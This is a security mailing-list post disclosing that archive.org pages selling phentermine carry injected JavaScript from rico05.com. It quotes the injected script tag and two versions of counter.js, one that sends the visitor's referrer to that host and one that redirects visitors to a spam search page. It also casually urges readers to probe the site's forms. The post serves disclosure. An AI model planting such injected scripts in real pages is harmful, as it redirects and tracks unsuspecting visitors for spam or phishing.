Full Disclosure: www.archive.org <--- XSS (and under attack)

[wac <waldoalvarez00 () gmail com>]

Hello:

I could take a while to investigate this more but I have no
time ATM (veeery busy) and the website is under attack. (should be a
matter to try that script on some form. Get a virtual pass for the library,
digg in the book publishing forms and report back)

Try this links:
http://www.archive.org/details/BuyPhentermineOnline_979
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery


Parts of the HTML follows to help spot the hole

...

<a href="/search.php?query=subject:%22 free delivery%22"> free
delivery</a></p></div><p xmlns:fo="http://www.w3.org/1999/XSL/Format";
class="content" style="text-align:left;"><script language="javascript" src="
http://rico05.com/counter/counter.js?id=950&key=buy+phentermine";></script>

...



/--------- counter.js (called directly) ---------/

var ref = escape(document.referrer);
document.write('\<script  language=\"javascript\" src=\"
http://rico05.com/counter/counter.js?ref=' + ref + '\"\>\<\/script\>');

 /----- EOF -----/



/--------- counter.js (with referer forged) ---------/

document.location = 'http://rico05.com/search/?said=951&q=buy phentermine';

/----- EOF -----/


And that's it. A lot of money spamming users.
Who is said=951? Ask rico05.com if they are not a bunch of phishers should
tell you.

Regards
Waldo Alvarez

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/